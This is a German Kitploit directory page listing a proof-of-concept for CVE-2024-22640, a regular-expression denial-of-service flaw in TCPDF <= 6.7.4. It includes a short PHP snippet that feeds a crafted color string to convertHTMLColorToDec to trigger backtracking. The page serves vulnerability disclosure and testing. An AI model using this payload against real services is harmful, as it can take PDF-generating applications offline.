Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-22640 — Proof-of-Concept-Exploit für CVE-2024-22640, eine ReDoS-Schwachstelle in TCPDF <=6.7.4, ausgelöst durch manipulierte HTML-Farbeingabe, mit Demonstrationscode. | Kitploit
Tools/GitHubGitHub/zunak/cve-2024-22640
Statische AnalyseSchwachstellenanalyseCode-AnalyseExploitationWebsicherheitFuzzing
GitHubzunak/cve-2024-22640

CVE-2024-22640

Proof-of-Concept-Exploit für CVE-2024-22640, eine ReDoS-Schwachstelle in TCPDF <=6.7.4, ausgelöst durch manipulierte HTML-Farbeingabe, mit Demonstrationscode.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-22640

Schwachstellentyp

Regulärer Ausdruck Denial of Service (ReDoS)

Betroffenes Produkt und Version

TCPDF <= 6.7.4

Angriffsvektor

TCPDF parst HTML-Farbe, die manipuliertes Payload enthält.

Beschreibung

TCPDF-Version <= 6.7.4 ist anfällig für ReDoS (Regular Expression Denial of Service), wenn eine nicht vertrauenswürdige HTML-Seite mit einer manipulierten Farbe geparst wird.

PoC

root@kitploit:~
<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>

Hinweis: Überprüfung mit preg_last_error() nach der anfälligen Codezeile führt dazu, dass der reguläre Ausdruck mit PREG_BACKTRACK_LIMIT_ERROR beendet wird.

Tool herunterladen